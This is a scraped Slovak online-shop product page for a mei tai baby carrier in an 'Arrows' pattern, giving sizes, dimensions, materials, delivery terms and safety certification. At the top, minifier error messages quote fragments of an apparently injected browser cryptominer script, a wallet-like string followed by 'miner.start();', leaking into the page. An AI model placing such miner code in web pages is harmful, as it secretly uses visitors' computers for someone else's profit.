JSMin: Unterminated String at byte 148: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();JSMin: Unterminated String at byte 161: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */JSMin: Unterminated String at byte 651: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */;/* */ Mei tai vzor Arrows SALE

Nosič vzor Arrows

New product

Očarujúci nosič, ktorý si proste zamilujete. 

Ihneď k odberu hotové nosiče s čiernymi popruhmi vo veľkosti infant a maxi!

Viac detailov

1 ks

Pozor: Posledné kusy na sklade!

64,99 €

Viac info

Ergonomický nosič mei tai je určený na nosenie detí od 6 do 15 kg (od troch mesiacov do 3 rokov), ponúkame ho v troch veľkostiach. Dieťa noste vždy tvárou k sebe, nosenie je možné vpred na hrudi nosiacej osoby a na chrbte.

Naše nosiče umožňujú pohodlné nosenie vďaka rozšíreným ramenným popruhom a pevnému bedrovému pásu.

Nosič sa upevňuje pomocou vystuženého popruhu okolo pása, uväzuje sa na dvojitý uzol. Ramenné popruhy sú pre lepší komfort nosenia tiež vystužené. Mei tai umožňuje diskrétne dojčenie vo vertikálnej polohe.

Hlavičku dieťaťa je možné zakryť alebo podoprieť odnímateľnou kapucňou, ktorá sa pripevňuje pomocou 2 patentov k telu nosiča a podľa potreby na ramene nosiaceho. Jej veľkosť a tvar nastavíte pomocou šnúrok a bŕzd.

Dĺžka popruhov nosiča pri všetkých veľkostiach nosiča (Infant, Toddler, Maxi) je vhodná pre všetky bežné konfekčné veľkosti postavy nosiaceho (do obvodu pásu 130 cm/výšky 190cm). Pre nosiacich s konfekčnou veľkosťou 44 a viac vieme pripraviť predĺžené popruhy. Pre nosiacich s pásom užším než 65 cm vieme upraviť na mieru dĺžku bedrového vystuženia, pri zadávaní objednávky nám napíšte do poznámky. Ak si neviete rady s výberom, obráťte sa na nás e-mailom info@handmadeALandIZI.sk, radi Vám poradíme.

Nosič mei tai ponúkame v troch veľkostiach – Infant, Toddler a Maxi. Ak máte dieťatko menšie -  od 3 mesiacov/6kg, vyberajte veľkosť Infant, jeho nosnosť je do 15kg a môžete ho používať po celú dobu nosenia. Ak máte už dieťatko staršie – zhruba od 10 kg, bude pre Vás praktickejšia veľkosť Toddler, hlavne ak plánujete aktívne nosiť aj v druhom roku života dieťatka, nosnosť modelu Toddler je min. 15kg. Ak má vaše dieťa 13 a viac kg a je vyššej postavy, zvoľte veľkosť Maxi, je určená noseným deťom okolo druhého roka života (a pre staršie). Nosnosť 20kg.

Výšku chrbtovej opierky môžete pri všetkých veľkostiach jednoducho znížiť o 10cm stočením pásového popruhu.

NOSIČ obsahuje:

Nosič Vám zašleme v praktickom látkovom vrecúšku, ktoré je možné zavesiť na rameno a aj s návodom na viazanie a údržbu. Pri veľkostiach infant a toddler je kapucňa v základnej výbave.

Ako si uviazať mei tai (čítaj mej taj), ako znížiť chrbtovú opierku, ako používať kapucňu/oporu hlavy a ako dojčiť v nosiči si môžete pozrieť na našom videu tu.

Rozmery:

Telo nosiča výška: Infant: 41cm, Toddler 44,5cm, Maxi 58 cm

Šírka chrbtovej časti: Infant 36cm, Toddler 45cm, Maxi 48 cm

Ramenný popruh 210 cm, šírka 8 cm

Pásový popruh 150 cm, šírka 9 cm

Hmotnosť: cca 450g

Zloženie: 100% bavlna, výstuha: 80% polyester, 20% viskóza/100% polyester

DODACIA LEHOTA: odosielame do 24 hodín, ponúkame osobný odber v Bratislave (pri platbe prevodom na účet), alebo odoslanie Slovenskou poštou 1. alebo 2. triedou (s platbou na dobierku alebo vopred prevodom na účet)

Bezpečnosť: Naše nosiče sú v súlade s európskou i slovenskou legislatívou a prešli procesom testovania a certifikácie podľa normy EN 13209- 2:2015/STN 13209-2:2016. 

Reviews

No customer reviews for the moment.

Write a review

Nosič vzor Arrows

Nosič vzor Arrows

Očarujúci nosič, ktorý si proste zamilujete. 

Ihneď k odberu hotové nosiče s čiernymi popruhmi vo veľkosti infant a maxi!